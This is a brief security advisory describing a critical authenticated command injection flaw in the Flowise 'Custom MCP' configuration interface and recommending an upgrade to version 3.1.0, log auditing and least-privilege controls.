An authenticated command injection vulnerability in Flowise allows attackers to execute arbitrary code on the underlying host OS.

The vulnerability exists in the "Custom MCP" configuration interface, where insufficient input sanitization allows an authenticated attacker to inject malicious arguments into stdio commands, bypassing existing validation checks.

Successful exploitation grants an attacker full control over the underlying server, enabling data exfiltration, ransomware deployment, or complete system takeover. With a CVSS score of 9.9, this vulnerability represents a critical threat to the confidentiality, integrity, and availability of the host environment.

Immediate Action: Upgrade Flowise to version 3.1.0 or later immediately to address the command injection flaw.

Proactive Monitoring: Audit logs for suspicious process creation or unusual command executions originating from the Flowise service account.

Compensating Controls: Implement strict network segmentation and ensure the application runs with the least-privilege principle to contain potential breaches.

Public Exploit Available: Unknown

This vulnerability presents a severe risk to infrastructure integrity. Administrators should apply the 3.1.0 update immediately and conduct a thorough review of the application's configuration to ensure no malicious MCP servers were added prior to the patch.